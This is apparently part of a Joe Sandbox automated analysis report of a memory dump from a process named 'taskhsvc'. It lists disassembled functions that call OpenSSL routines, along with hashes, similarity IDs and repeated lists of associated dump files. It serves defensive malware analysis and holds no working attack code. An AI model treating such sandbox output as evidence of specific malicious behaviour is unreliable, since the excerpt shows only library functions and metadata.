                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: S7_it$E_read_O_new___stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3000705294-0
                                                            • Opcode ID: 9ed410209fa8d76f592409d18052611f8fd58c1810b2675441e7431d8ee182b3
                                                            • Instruction ID: 282e81430957a155f3daf4a002780d56f59bbe512ab0ff318cc70d4de22d1cb7
                                                            • Opcode Fuzzy Hash: 9ed410209fa8d76f592409d18052611f8fd58c1810b2675441e7431d8ee182b3
                                                            • Instruction Fuzzy Hash: 6501E47051A750AFCB50EF36C68484FBBF4AF89208F12AD1DE69587B04D330E8498F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70FB0 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 759496812-0
                                                            • Opcode ID: 86fca0832cdfae91e92c0065fd8d3f8dd100637637e488e9c4ab126cb9b34e4a
                                                            • Instruction ID: a10d39ba69ed0418c4913e06aa957a7ad0759ea650b66f9d0ec807c219b2fe9a
                                                            • Opcode Fuzzy Hash: 86fca0832cdfae91e92c0065fd8d3f8dd100637637e488e9c4ab126cb9b34e4a
                                                            • Instruction Fuzzy Hash: F921C4719097409FCB50DF79D280A4FBBF1BB89314F46991CE5A8CB704D231E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF348D0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_new.LIBEAY32 ref: 6CF348F2
                                                              • Part of subcall function 6CF08340: ASN1_item_new.LIBEAY32 ref: 6CF08355
                                                            • ERR_put_error.LIBEAY32 ref: 6CF34A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_newR_put_errorX509_new
                                                            • String ID: A$M${
                                                            • API String ID: 877463836-3265063180
                                                            • Opcode ID: b1123be56daacaae072a79adbd6b1bf091dc31028b96f52456a4d90864d0f00b
                                                            • Instruction ID: 10707f2bb0743ec87090a7cb1d6e06394885e7507e273e4f5e44dccc68d10920
                                                            • Opcode Fuzzy Hash: b1123be56daacaae072a79adbd6b1bf091dc31028b96f52456a4d90864d0f00b
                                                            • Instruction Fuzzy Hash: 061112B46087109FDB04EF2AD98055ABBF4AF88358F12582DE999DB710E735E840CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70480 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 55b68aa0ca8519d36a68b8f8b9939dc6e83eeaad524c9f8c5a2cfa925b8dc53b
                                                            • Instruction ID: 4c227ce86c5d9027cf1a266a2d8730070d650e22c4883fdf2489e40c0a0e490e
                                                            • Opcode Fuzzy Hash: 55b68aa0ca8519d36a68b8f8b9939dc6e83eeaad524c9f8c5a2cfa925b8dc53b
                                                            • Instruction Fuzzy Hash: BE112A759086019FCB10EF35C28161BB7F1BB8A308F469D1CE9948B704E331EA598B86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF26D20 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_i2d__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3790965068-0
                                                            • Opcode ID: ca0383b3f338247b6ced0ccfde8a3c3a7c4a1a5e760433e6f0c6409224392328
                                                            • Instruction ID: e6fc23388d1ba82cec0b4c771d199e92f622cf8b2822eb65498acf98f621b91e
                                                            • Opcode Fuzzy Hash: ca0383b3f338247b6ced0ccfde8a3c3a7c4a1a5e760433e6f0c6409224392328
                                                            • Instruction Fuzzy Hash: 3311B0756096019FCB40EF79C28164BBBF1AB89208F42991CE5A4CB704E730A9098F96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4EE50 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 288stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_parse_listsscanfstrchr
                                                            • String ID: :
                                                            • API String ID: 916882889-336475711
                                                            • Opcode ID: 434c26054a261cc8026e30d3bc1aca213ad4cc3dd730dc51535f12d71f1bd909
                                                            • Instruction ID: 29fab1ca65f315084c11dbbea9262ef5864171fabe09921425a9908a56d836f9
                                                            • Opcode Fuzzy Hash: 434c26054a261cc8026e30d3bc1aca213ad4cc3dd730dc51535f12d71f1bd909
                                                            • Instruction Fuzzy Hash: 73B17D352093458FEB21CF28C18135BFFE1BF85318F15CA6DE9968BA86D7319506CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF34F60 Relevance: 9.0, APIs: 6, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • i2d_X509_NAME.LIBEAY32 ref: 6CF34F84
                                                              • Part of subcall function 6CF07E50: ASN1_item_i2d.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,6CF350B8), ref: 6CF07E75
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CF34F90
                                                            • EVP_MD_CTX_set_flags.LIBEAY32 ref: 6CF34FA0
                                                            • EVP_md5.LIBEAY32 ref: 6CF34FA5
                                                            • EVP_DigestInit_ex.LIBEAY32 ref: 6CF34FB9
                                                              • Part of subcall function 6CEDCFD0: EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCFF8
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CF34FC7
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CF34FF3
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CF3500F
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF3501E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF35057
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$__stack_chk_fail$Final_exInit_exN1_item_i2dP_md5UpdateX509_X_cleanupX_clear_flagsX_initX_set_flagsi2d_
                                                            • String ID:
                                                            • API String ID: 2267062919-0
                                                            • Opcode ID: 3959ce6b758f40c34a83658d0098fa79e45980063524c8b4fce133464dc5a0b9
                                                            • Instruction ID: 5762cce9bf0e0dceff992b17d0757d666da14fe2f9c40b2e2ee950313586b633
                                                            • Opcode Fuzzy Hash: 3959ce6b758f40c34a83658d0098fa79e45980063524c8b4fce133464dc5a0b9
                                                            • Instruction Fuzzy Hash: E20119B41187109FC740EF24D58064FBBF0BF48798F02981DE4898B740D775E848CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF22F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: r${
                                                            • API String ID: 1767461275-2651532350
                                                            • Opcode ID: 54ac6bd364c49f65579eab31614fca481b7a692d3580023716370935f62411d1
                                                            • Instruction ID: 833a79ce3198ba8710a241e455ad89506a8b0f1674f68602dc57b57b172c07be
                                                            • Opcode Fuzzy Hash: 54ac6bd364c49f65579eab31614fca481b7a692d3580023716370935f62411d1
                                                            • Instruction Fuzzy Hash: 5961AEB161D7409FD350CF68C48035BBBE2AB89344F55992DF4E88B711D37AD4098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEA48E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
